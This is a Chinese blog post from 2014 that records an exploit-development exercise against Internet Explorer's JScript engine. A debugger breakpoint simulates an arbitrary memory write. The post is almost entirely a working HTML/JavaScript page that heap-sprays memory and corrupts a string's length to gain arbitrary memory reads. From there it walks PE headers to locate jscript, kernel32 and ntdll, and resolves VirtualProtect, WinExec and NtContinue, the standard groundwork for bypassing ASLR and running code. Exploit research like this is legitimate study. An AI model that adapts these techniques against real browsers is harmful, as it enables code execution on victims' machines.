

 
 
 


 
 

信息泄漏测试,构造JS版GetProcAddress  

2014-10-27 13:32:52|  分类: 一些练习 |  标签: |举报 |字号 订阅


从tk的pdf里拷出来,自己补充的。

下一个断点就行，用来模拟向任意地址写入任意值。

bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"

以下是测试文件:

<!DOCTYPE HTML>
<HTML>
 <HEAD>
  <TITLE> InfoLeak Test2 </TITLE>
 </HEAD>

 <BODY>
  <SCRIPT LANGUAGE="JavaScript">
  <!--
  var block = "\u0000";

  // [ repeat the block to 512KB ]
  while (block.length < 0x40000){
   block += block;
  }

  // [ Allocate 200 MB ]
  var slide = new Array();
  for (var i = 0; i < 400; i++){
   slide[i] = block.substr(0,block.length);
  }
  // alert("heapspary done");

  var spryaddr = 0x0c0c0c0c;
  var i, p, modified, leakstr, lenaddr;

  Math.atan2(spryaddr, 0x11223344);// bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"

  // =ed=
  // $t1=0c0c0c0c
  // $t2=11223344

  for (i = 0; i < slide.length; i++) {
   p = slide[i].search(/[^\u0000]/);
   if (p != -1) {
    modified = i;
    leakstr = slide[modified];
    lenaddr = spryaddr - (p)*2 - 4;
    break;
   }
  }
  alert(lenaddr.toString(16));

  Math.atan2(lenaddr, 0x7ffff000);// bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"

  // =ed=
  // $t1=0c060020
  // $t2=7ffff000

  var testaddr = 0x3e389ad2;

  alert(leakstr.length.toString(16));
  alert(escape(leakstr.substr((testaddr-lenaddr-4)/2, 8)));

  function readDword(address) // address % 2 == 0
  {
   var str = leakstr.substr((address-lenaddr-4)/2, 2);
   return (str.charCodeAt(1)<<16 | str.charCodeAt(0));
  }

  function GetBaseAddrByPoiAddr( PoiAddr )
  {
   var BaseAddr = 0;
   BaseAddr = PoiAddr & 0xFFFF0000;
   while( readDword(BaseAddr)     != 0x00905A4D ||
       readDword(BaseAddr+0xC) != 0x0000FFFF    )
   {
    BaseAddr -= 0x10000;
   }
   return BaseAddr;
  }
  
  function astr2jstr(astraddr)
  { 
   var str,a,i=0,s="";
   a=(astraddr%2)?astraddr-1:astraddr;
   str = leakstr.substr((a-lenaddr-4)/2, 32);

   if (astraddr % 2 !=0)
   {
    w=str.charCodeAt(i);
    if (w >>8 ) {s=s+"%u00"+(w >> 8).toString(16);i++;} else return s;
   }

   for (; i<str.length; i++)
   {
    w=str.charCodeAt(i);
    if (w & 0xff) s=s+"%u00"+(w & 0xff).toString(16); else break;
    if (w >>8 ) s=s+"%u00"+(w >> 8).toString(16); else break;
   }
   return (unescape(s));
  }

  //alert( "astr2jstr="+astr2jstr(testaddr) );

  function GetModuleFromImport( ModuleName, LibAddr )
  {
   var p   = 0;
   var pImport;  // PIMAGE_IMPORT_DESCRIPTOR
   p = readDword(LibAddr + 0x3C);
   p = readDword(LibAddr + p + 0x80);
   pImport = LibAddr + p;
   while( readDword(pImport+0x0C) != 0 )
   { 
    if (ModuleName.toLowerCase()==astr2jstr(LibAddr+readDword(pImport+0x0C)).toLowerCase())
    { 
     p = LibAddr + readDword(pImport+0x10);
     p = readDword(p+0x10);
     return GetBaseAddrByPoiAddr(p);
    }
    pImport+=0x14;
   }
  }


  function GetProcAddress( LibAddr, ProcName )
  {
   var FuncAddr;
   var pExport;
   var pNameBase;
   var AddressOfNameOrdinals;
   var i;

   p = readDword(LibAddr + 0x3C);
   p = readDword(LibAddr + p + 0x78);
   pExport = LibAddr + p;
   NumberOfNames = readDword(pExport + 0x18);
   pNameBase = LibAddr + readDword(pExport + 0x20);

   for (i=0; i < NumberOfNames; i++)
   { 
    p=LibAddr+readDword(pNameBase+4*i);
    if (ProcName.toLowerCase()==astr2jstr(p).toLowerCase())
    {
     break;
    }
   }

   //alert( i+"==="+astr2jstr(LibAddr+readDword(pNameBase+4*i)) );

   t5 = LibAddr + readDword(pExport + 0x24);
   t5 = readDword(t5 + 2*i) & 0xffff;
   t6 = LibAddr + readDword(pExport + 0x1c);
   t6 = LibAddr + readDword(t6 + t5*4);
   
   return t6;
  }

  var jscript = GetBaseAddrByPoiAddr(testaddr);
  var kernel32 = GetModuleFromImport("kernel32.dll", jscript);
  var ntdll    = GetModuleFromImport("ntdll.dll", kernel32);
  var VirtualProtect = GetProcAddress(kernel32, "VirtualProtect");
  var WinExec        = GetProcAddress(kernel32, "WinExec");
  var NtContinue     = GetProcAddress(ntdll, "NtContinue");

  alert("jscript="+jscript.toString(16));
  alert("kernel32="+kernel32.toString(16));
  alert("ntdll="+ntdll.toString(16));
  alert("VirtualProtect="+VirtualProtect.toString(16));
  alert("WinExec="+WinExec.toString(16));
  alert("NtContinue="+NtContinue.toString(16));

  //-->
  </SCRIPT>
 </BODY>
</HTML>
